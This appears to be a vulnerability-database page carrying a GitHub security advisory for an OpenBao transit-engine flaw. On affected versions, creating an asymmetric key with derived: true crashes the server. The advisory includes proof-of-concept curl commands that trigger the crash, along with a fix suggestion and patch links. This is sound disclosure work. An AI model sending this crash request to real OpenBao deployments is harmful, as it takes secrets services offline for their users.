GHSA-8W8F-R2XV-4Q4J

Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42
VLAI
Summary
OpenBao: Transit secrets engine crashes on key creation with `derived: true` for asymmetric key types
Details

On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to transit/keys/* can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric type (rsa-*, ecdsa-*, ed25519) with derived: true. The server returns no HTTP response and the process terminates (exit code 2). This is a remote, low-complexity denial-of-service against the OpenBao server.

Mount the transit engine:

 `curl -sS -X POST -H "X-Vault-Token: root" \
   -d '{"type":"transit"}' \
   http://127.0.0.1:8200/v1/sys/mounts/transit`

Trigger the crash:

 `curl -sS -w '\nHTTP %{http_code}\n' -X POST \
   -H "X-Vault-Token: root" \
   -H "Content-Type: application/json" \
   -d '{"type":"rsa-2048","derived":true,"exportable":true,"deletion_allowed":false}' \
   http://127.0.0.1:8200/v1/transit/keys/some-key-name`

You can try with both JSON or HCL It will crash the entire cluster.

Observed: HTTP 000 curl: (52) Empty reply from server

 $ docker ps -a --filter name=openbao
 STATUS: Exited (2)

Root Cause (Hypothesis) Key-derivation paths in the transit engine appear to assume a symmetric key shape (a derivable key context). When derived: true is supplied alongside an asymmetric type, the creation path likely panics on a missing derived-key field or invalid type assertion rather than returning a structured validation error. Maintainers should confirm against the transit policy.go / key-creation path.

Suggested fix: Validate the (type, derived) combination at the top of the create-key handler. Reject with a 400 if derived: true is set on any non-symmetric type (i.e. anything other than aes128-gcm96, aes256-gcm96, chacha20-poly1305, xchacha20-poly1305). Do this before any code path that may panic on missing derived-key state.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openbao/openbao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.0"
            },
            {
              "last_affected": "2.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openbao/openbao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260617104123-db57c62602b2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55776"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:42:09Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to `transit/keys/*` can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric `type` (`rsa-*`, `ecdsa-*`, `ed25519`)\nwith `derived: true`. The server returns no HTTP response and the process terminates (exit code 2). This is a remote, low-complexity denial-of-service against the OpenBao server.\n\n\nMount the transit engine:\n\n     `curl -sS -X POST -H \"X-Vault-Token: root\" \\\n       -d \u0027{\"type\":\"transit\"}\u0027 \\\n       http://127.0.0.1:8200/v1/sys/mounts/transit`\n\nTrigger the crash:\n\n     `curl -sS -w \u0027\\nHTTP %{http_code}\\n\u0027 -X POST \\\n       -H \"X-Vault-Token: root\" \\\n       -H \"Content-Type: application/json\" \\\n       -d \u0027{\"type\":\"rsa-2048\",\"derived\":true,\"exportable\":true,\"deletion_allowed\":false}\u0027 \\\n       http://127.0.0.1:8200/v1/transit/keys/some-key-name`\n\nYou can try with both JSON or HCL It will crash the entire cluster.\n\n  Observed:\n     HTTP 000\n     curl: (52) Empty reply from server\n\n     $ docker ps -a --filter name=openbao\n     STATUS: Exited (2)\n\nRoot Cause (Hypothesis)\nKey-derivation paths in the transit engine appear to assume a symmetric key shape (a derivable key context). When `derived: true` is supplied alongside an asymmetric `type`, the creation path likely panics on a missing derived-key field or\n  invalid type assertion rather than returning a structured validation error. Maintainers should confirm against the transit `policy.go` / key-creation path.\n\nSuggested fix:\nValidate the (`type`, `derived`) combination at the top of the create-key handler. Reject with a 400 if `derived: true` is set on any non-symmetric type (i.e. anything other than aes128-gcm96, aes256-gcm96, chacha20-poly1305,\nxchacha20-poly1305). Do this before any code path that may panic on missing derived-key state.",
  "id": "GHSA-8w8f-r2xv-4q4j",
  "modified": "2026-06-19T21:42:09Z",
  "published": "2026-06-19T21:42:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/security/advisories/GHSA-8w8f-r2xv-4q4j"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/pull/3309"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/commit/db57c62602b25da12951f3f0edb888e7c4da61e5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openbao/openbao"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/releases/tag/v2.5.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenBao: Transit secrets engine crashes on key creation with `derived: true` for asymmetric key types"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…